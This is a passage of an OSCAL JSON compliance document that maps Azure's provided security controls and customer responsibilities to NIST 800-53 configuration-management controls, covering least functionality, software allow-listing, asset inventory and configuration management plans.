essential functions, ports, protocols, and services are enabled."}],"responsibilities":[{"uuid":"2f46699d-0d33-498e-b43c-fdac6423e99e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-043"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for configuring customer-deployed resources to only provide essential capabilities (e.g., disabling extraneous services that may be provided by default, using a system for a single function rather than a system supporting multiple functions).","provided-uuid":"983b3390-05be-4458-a0b7-43ee602037a0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a64b9474-b592-470e-99d9-ebf8d7426ac6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7_smt.b","by-components":[{"uuid":"809b8473-507d-4ea5-bee6-3cf6878f691a","export":{"provided":[{"uuid":"3105795c-de5e-4d44-9bab-0f0fc6cf9901","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-044"}],"description":"USGCB guidance, CIS Benchmarks, DISA STIGs, vendor recommendations, and internal research are taken into consideration during the development of operating system images. These images include essential functions, ports, protocols, and services. All other functions, ports, protocols, and services are disabled by default. The configuration baseline for ports and protocols allowed for Azure services are monitored by the C+AI Security team via Network Isolation (NetIso). C+AI Security monitors network configurations of Windows and Linux services for internet exposed management endpoints and high-risk ports and protocols as defined per the C+AI Platform security baseline process. Service teams must go through an approval process to have a port opened, or a function, protocol, or service enabled. For network devices, the Azure Networking Standards and Architecture team sets the configuration baseline standards for all network devices, using recommended configurations specific to each hardware vendor, and makes updates periodically based upon recommendations from the vendor. These configuration baselines include essential functions, ports, protocols, and services."}],"responsibilities":[{"uuid":"6867f9b3-1ddd-4c21-928d-b19b85ef8889","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-044"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for prohibiting or restricting the use of specific functions, ports, protocols, and/or services to provide least functionality.","provided-uuid":"3105795c-de5e-4d44-9bab-0f0fc6cf9901"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cb0c9c30-c6c7-4180-87f1-651e96463d81","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7.1","statements":[{"uuid":"29ef060b-7de0-4b6c-a918-7bb8cd547b9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.1_smt.a","by-components":[{"uuid":"b932295a-30ae-407f-b3d8-fae38134a4dc","export":{"provided":[{"uuid":"6103b5f8-21d5-4488-b8f2-568141505308","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-045"}],"description":"Azure software and hardware configurations and Access Control Lists (ACLs) are reviewed at least monthly to identify any unnecessary or non-secure functions, ports, protocols, and services._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cc7cc861-c02a-41de-91d8-81c598c70868","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-045"}],"description":"The customer is responsible for reviewing customer-deployed resources to identify unnecessary and/or unsecure functions, ports, protocols, and services.","provided-uuid":"6103b5f8-21d5-4488-b8f2-568141505308"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0c13b786-0a8c-498d-a649-13c932e1ffc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.1_smt.b","by-components":[{"uuid":"c4726cf8-a68b-465b-9aa3-c6d1319d3b7f","export":{"provided":[{"uuid":"571ebe05-4957-499e-afdc-4581aaa30840","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-046"}],"description":"Any function, port, protocol, or service identified as unnecessary or non-secure during the review process is disabled._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fd9c869c-ca18-46ca-a582-4e729f926197","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-046"}],"description":"The customer is responsible for disabling functions, ports, protocols, and services deemed to be unnecessary or unsecure.","provided-uuid":"571ebe05-4957-499e-afdc-4581aaa30840"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"26efd495-712a-48bb-b61c-445a3cf6325e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7.2","statements":[{"uuid":"5b480795-50c1-4094-ab37-33d2fd0f9f09","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.2_smt","by-components":[{"uuid":"a96b1239-ab8e-4329-8e90-176df82f2f30","export":{"provided":[{"uuid":"d9221605-1c6d-4ce5-a070-fd227d2ff2aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-047"}],"description":"Installed software is monitored using Azure Security Monitoring (ASM) and SCUBA. If unauthorized software installation is detected, the Security Response Team responds._x000D_ _x000D_ Azure System Lockdown (AzSysLock) is a process in place to protect all Azure production assets from malicious code by ensuring only digitally signed and pre-authorized executables and scripts can run. Azure has implemented the capability needed to meet the requirement of preventing program execution. At this time, the ASM and SCUBA tools monitor assets for the software that has been installed but do not require preventing any unauthorized software from being installed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d5db8d26-553a-4568-a3d5-3c623c0452a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-047"}],"description":"The customer is responsible for preventing program execution in accordance with customer-defined software program usage policies.","provided-uuid":"d9221605-1c6d-4ce5-a070-fd227d2ff2aa"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8d661c91-f1de-4281-bcde-bacf45041fbe","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7.5","statements":[{"uuid":"00b12965-024b-4d97-a09c-a2dd82cfc9c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.5_smt.a","by-components":[{"uuid":"bb72ba08-118a-4cf9-ab58-42e1bcbd8061","export":{"provided":[{"uuid":"2a7a03be-c14c-4a0c-b735-88afc20f9222","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-048"}],"description":"Azure identifies software authorized to execute within Azure via configuration baselines and configuration scripts. Both baselines and scripts are version controlled and under configuration management. Only software included in a baseline or configuration script may be installed on Azure. Azure uses Azure Security Monitoring (ASM) and SCUBA to identify unauthorized software execution and alert appropriate personnel for further review._x000D_ _x000D_ In addition to the standard release processes as part of OneBranch processes which includes build release verification steps such as virus scanning, services running AzSecPack are monitored by the Azure System Lockdown (AzSysLock) team for unexpected running software. This is defined as any software that is not signed per the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using AppLocker and Code Integrity. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for unsigned binaries running are created to service owners as a Severity 2 incident per Azure CEN._x000D_ _x000D_ For services running Azure Security Pack, the OS security configuration baseline is also monitored for baseline violations, which are then reported to service owners through Incident Management (IcM) and/or Service 360 (S360) depending on the severity of the violation. Near real-time alerts include alerts for audit processing failures, such as system time changes or audit policy changes._x000D_ _x000D_ Additionally, virtual components within Azure are managed by the Fabric Controller (FC), which is the component that is used to create, monitor, restart, and destroy virtual machines. Overall VM and Azure Host/Native management coverage of AzSecPack is maintained by AzSecPack._x000D_ _x000D_"}],"responsibilities":[{"uuid":"495ce201-9cbc-4a8e-ad98-0324811d3dfb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-048"}],"description":"The customer is responsible for identifying software programs authorized to execute on customer-deployed resources.","provided-uuid":"2a7a03be-c14c-4a0c-b735-88afc20f9222"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"53397dda-dbfe-46f2-bb68-395226054d6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.5_smt.b","by-components":[{"uuid":"692c5cbd-9c81-4191-9f39-d3f0ca05636e","export":{"provided":[{"uuid":"b5616b43-994d-4c3a-8f9a-fa0a22895243","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-049"}],"description":"Azure employs a deny-by-default, permit-by-exception software policy. Any changes to baselines or configuration scripts must be reviewed and approved by the appropriate change review committee._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c1dea389-0dbd-44db-90bf-35e9b9c9c695","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-049"}],"description":"The customer is responsible for employing a deny-all, permit-by-exception policy to allow the execution of authorized software programs on customer-deployed resources.","provided-uuid":"b5616b43-994d-4c3a-8f9a-fa0a22895243"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"da5d73cf-61b0-4b8b-91a5-8d221db988e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.5_smt.c","by-components":[{"uuid":"8a4b583a-5186-4a06-b8e0-63307ec48842","export":{"provided":[{"uuid":"80b92e79-e1f7-47dd-ab7f-820b46a31298","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-050"}],"description":"Azure service teams review and update baselines and configuration scripts at least annually._x000D_ _x000D_"}],"responsibilities":[{"uuid":"73123e17-b1ac-4aca-bf8e-75be0218b26e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-050"}],"description":"The customer is responsible for reviewing and updating the list of authorized software programs.","provided-uuid":"80b92e79-e1f7-47dd-ab7f-820b46a31298"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"85749b8f-dcdf-474f-9c61-417f03457d17","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8","statements":[{"uuid":"711c8aa0-ab17-46a1-9a2f-99e68154861e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8_smt.a","by-components":[{"uuid":"775310c4-f985-4259-9b45-bfea25d81ce1","export":{"provided":[{"uuid":"34ad8803-20c9-4f2b-901d-45c26e4916a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-051"}],"description":"After collecting inventory information from the below sources and teams, Azure consolidates the information and performs month-over-month data analysis and reconciliation. Any changes to, additions to, or removals from the inventory are identified, verified, and explained. This data is stored within the Kusto, EventHub, and Cosmos tools. For all asset types, the inventory is consistent with the authorization boundary because it is kept up to date with new installations and decommissioning of devices. The inventory of logical assets are tracked in service Privacy Review documentation, which is reviewed as a part of the regular privacy review, or when there is a new component being reviewed as a part of the new feature Privacy Review. The Privacy Review documentation also maintains the retention requirements of the data as per regulatory requirements. The inventory of all assets for Azure services must be maintained by and are obtained from the service owners using the following methods. The management of inventory by service owners ensures there is no duplicate accounting of inventory and assets are assigned a unique identifier. Servers Physical inventory data is pulled daily from nine different sources, both available to customers and internal tools. These sources include OneAsset, Cedis, GDCO App, ImageOps, Rescue_DNS, DCM, MSODS, DERA, AzSecSlam, DCMT, Cockpit, VMAC, Intune, Active Directory (AD), DNS, Network Graph Service (NGS), and Fabric2. These sources are maintained by each individual service team. Host The Host inventory consists of nodes which have VM containers running on top of them. Nodes are differentiated by the type of work they do. If a node hosts virtual machines, then it is a Host node. If a node doesn't have virtual machines and the entire node is in use, then it is a Native node. Host inventory data is generated automatically using subscription data. Native Native data is generated automatically using subscription data. Infraguest Infraguest data is generated from subscriptions within Service Tree and the SQL team. Those subscriptions are then used to query Geneva Actions; each service team owns Azure subscriptions, and Geneva Actions generates reports showing all of the virtual machines belonging to each subscription ID. Bare Metal The Bare Metal server inventory is defined as assets that are not managed by either Azure or Auto Pilot/Pilot Fish. The asset type Includes both physical servers and virtual machines. The inventory mapping is done through Service Tree. All Global Datacenter Operations (GDCO) app assets are assigned a Property Group and Property Dimension. These are assigned the ownership. Service Tree takes the owner associated and assigns a service based on the owner's division. Pilotfish Pilotfish data is generated from the Pilotfish team, which provides a Kusto cluster database that the Inventory team ingests to get the data. Network Devices Network data is populated from streams from the Azure Networking team. The Azure Networking team provides device data in Kusto which is processed by the Inventory team to add other attributes like Service Tree Name and asset identifier. Services Asset information includes the responsible Azure service team. This ensures that no other information system identifies an asset as part of that information system. Service ownership is always at the asset level and Azure has various methods of determining ownership. Service teams own and manage Azure subscriptions which they use to deploy virtual machines and other services. Each subscription has a corresponding subscription ID. Property Dimension and Property Group mappings are used for Bare Metal machines which correlate to Service Tree ownership. This helps to ensure Microsoft only ever has a 1-to-1 mapping between assets and a service. Databases Database information is calculated based upon the inventory of physical and virtual servers received from each team."}],"responsibilities":[{"uuid":"3413acff-0d19-4c94-8a22-bdcb2e5bff7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing and documenting an inventory of customer-deployed resources, that supports tracking and reporting, and includes any information the customer has deemed necessary to achieve effective accountability.","provided-uuid":"34ad8803-20c9-4f2b-901d-45c26e4916a3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b1fb9c37-84d6-4f4d-8e6c-cd24c12ea7d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8_smt.b","by-components":[{"uuid":"ca580aa9-8aa5-4cf3-915e-910ddad34775","export":{"provided":[{"uuid":"a1a0cccf-f45b-44ea-b220-114de5fdc609","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-052"}],"description":"Azure Fleet Inventory ingests the asset type sources providing the asset data every couple of hours and source teams provide data anywhere from every hour to every 24 hours. Azure updates the system inventory at least monthly using the sources identified and includes updated inventory information in the monthly Continuous Monitoring report provided to the authorizing officials."}],"responsibilities":[{"uuid":"15c0d28a-9658-459b-a835-764235492b62","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-052"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the inventory defined in CM-08.a.","provided-uuid":"a1a0cccf-f45b-44ea-b220-114de5fdc609"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"95acddb9-7ef8-4b86-9576-79609351502b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.1","statements":[{"uuid":"580b988d-45c9-491f-a45b-e4a1795a94aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.1_smt","by-components":[{"uuid":"7b11f4d1-6af0-4dae-b451-79bad92949d5","export":{"provided":[{"uuid":"fffdbbf0-45cd-4d7d-8ed2-a9d52779e874","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-053"}],"description":"Azure service teams are responsible for updating the inventory of information system components using Service Tree, Property Groups, and Property Dimensions as an integral part of component installations, removals, and information system updates. The inventory tracks specific inventory information for all Azure assets. Additionally, Azure generates a complete inventory each month, and analyzes and reconciles all changes from the previous month's inventory._x000D_ _x000D_ As an additional protection, Azure employs strict physical access controls in the datacenters to mitigate the unauthorized addition of new devices into the environment. Physical access to the devices to add additional ports is also disabled within the environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"2eaab674-c98f-472a-9e7b-b25d831c425d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-053"}],"description":"The customer is responsible for reviewing and updating the inventory of customer-deployed resources when installations, removals, and system updates occur.","provided-uuid":"fffdbbf0-45cd-4d7d-8ed2-a9d52779e874"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c34bc02a-fd8a-4e7f-9590-52387179e25c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.2","statements":[{"uuid":"205dee3f-2ca7-4159-b40b-23ee6f714f6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.2_smt","by-components":[{"uuid":"3f81ed8c-0874-494e-a5fc-ec1b74227750","export":{"provided":[{"uuid":"37202c71-5333-4127-a47e-1f3658f11b0f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-054"}],"description":"Azure uses numerous automated mechanisms for ensuring the inventory is accurate, including Service Tree for subscriptions and team mappings, Geneva Actions, and MS Asset._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fef8c58d-27ea-4b4c-b593-3a3d0050901c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-054"}],"description":"The customer is responsible for employing automated mechanisms to maintain an up-to-date, complete, accurate, and readily available inventory of customer-deployed resources.","provided-uuid":"37202c71-5333-4127-a47e-1f3658f11b0f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e07e9403-17b7-4b04-afab-15ec432e1d75","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.3","statements":[{"uuid":"c2551b42-f551-426a-b86f-4ab289d9f606","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.3_smt.a","by-components":[{"uuid":"03f7e342-39d8-419a-82d2-678eff1cd59b","export":{"provided":[{"uuid":"b147f578-2e8d-4986-ad64-f937ab60627d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-055"}],"description":"As a primary protection, Azure employs strict physical access controls in the datacenters to mitigate the unauthorized addition of new devices into the environment. Physical access to the devices to add additional ports is also disabled within the environment._x000D_ _x000D_ Servers_x000D_ _x000D_ In addition to the standard release processes as part of OneBranch processes which includes build release verification steps such as virus scanning, services running AzSecPack are monitored by the Azure System Lockdown (AzSysLock) team for unexpected running software. This is defined as any software that is not signed per the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using AppLocker and Code Integrity. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for unsigned binaries running are created to service owners as a Severity 2 incident._x000D_ _x000D_ AzSecPack also monitors the server security configuration baseline for baseline violations, which are then reported to service owners through Incident Management (IcM) and/or Service 360 (S360) depending on the severity of the violation. Near real-time alerts include alerts for audit processing failures, such as system time changes or audit policy changes._x000D_ _x000D_ Additionally, virtual components within Azure are managed by the Fabric Controller (FC), which is the component that is used to create, monitor, restart, and destroy virtual machines. Overall VM and Azure Host/Native management coverage of AzSecPack is maintained by AzSecPack._x000D_ _x000D_ Network Devices_x000D_ _x000D_ All network devices managed by Azure Networking go through the Configuration Policy Verifier (CPV) tool. This tool is executed on all devices which are in buildout to run a series of acceptance tests on devices before they are marked ready for production._x000D_ _x000D_"}],"responsibilities":[{"uuid":"bbd0f7e3-0af0-49d0-b211-b317769e72c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-055"}],"description":"The customer is responsible for employing automated mechanisms to detect the presence of unauthorized software within customer-deployed resources.","provided-uuid":"b147f578-2e8d-4986-ad64-f937ab60627d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6f50a78f-e308-410b-983b-00292a7a64a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.3_smt.b","by-components":[{"uuid":"4889200d-0bd1-480d-bded-356ae7b74066","export":{"provided":[{"uuid":"3043b020-ed06-45f9-989b-7ab0e4cbd2d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-056"}],"description":"Azure does not wait to isolate components by disabling network access for unauthorized components. When network devices are deployed, ports are turned off by default. Unassigned ports are put into a VLAN that is not configured at Layer 3 (L3) and has no provisioned servers in it. Thus, even if ports were enabled, there is no access to any provisioned servers and traffic does not have the ability to leave the VLAN subnet. To prevent IP spoofing, Azure uses ACLs on the L3 to deny packets sourced by the subnet from entering that subnet._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fc579c57-2c40-4f9c-b456-2f81171390ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-056"}],"description":"The customer is responsible for taking action when unauthorized software is detected.","provided-uuid":"3043b020-ed06-45f9-989b-7ab0e4cbd2d1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"00e02759-4949-4b64-b46a-81720768317a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.4","statements":[{"uuid":"279d8810-5fda-40d6-ba41-0fa097ad58ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.4_smt","by-components":[{"uuid":"fd9fe5ff-e303-4558-a603-27bec1ea5f3e","export":{"provided":[{"uuid":"859005e5-da3c-4c3b-96e9-8cf42d5e0b1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-057"}],"description":"Inventory information includes the service team responsible for each component within Azure. Each service team designates one or more individuals or roles responsible for administering that team's components. These individuals can also be identified by position and role as necessary, and are present in Service Tree._x000D_ _x000D_"}],"responsibilities":[{"uuid":"60562ab2-d019-4595-b402-bb450d68220a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-057"}],"description":"The customer is responsible for including the individual(s) responsible/accountable for administering the customer-deployed resources listed in the inventory (see CM-08.a).","provided-uuid":"859005e5-da3c-4c3b-96e9-8cf42d5e0b1e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8ee69249-7a3d-491d-9983-506007b69a9d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-9","statements":[{"uuid":"b6bf47fa-2edb-4c28-b01d-e5b719776a3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-058"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.a","by-components":[{"uuid":"9d346fe6-c48f-4831-af57-09b2d043f0cc","export":{"provided":[{"uuid":"03725d94-bf77-4975-b941-4d2a42692bb0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-058"}],"description":"Azure has system-wide configuration management requirements and processes documented in its Azure Standard Operating Procedures (SOPs). These documents contain high-level roles and responsibilities, defines configuration management processes, and identifies configuration items as well as procedures for maintaining configuration items. All Azure service teams are required to comply with all SOPs, which are maintained appropriately. * Azure Security Baseline Governance Standard Operating Procedure (SOP) * Azure Security Development Lifecycle Standard Operating Procedure (SOP) * Azure Hardware Change and Release Management Standard Operating Procedure (SOP) * Azure Software Change and Release Management Standard Operating Procedure (SOP)"}],"responsibilities":[{"uuid":"1855d531-2a46-42cb-85dd-c4732c632b38","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-058"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that addresses roles, responsibilities, and configuration management processes and procedures.","provided-uuid":"03725d94-bf77-4975-b941-4d2a42692bb0"}]},"description":"See inheritance and customer responsibility 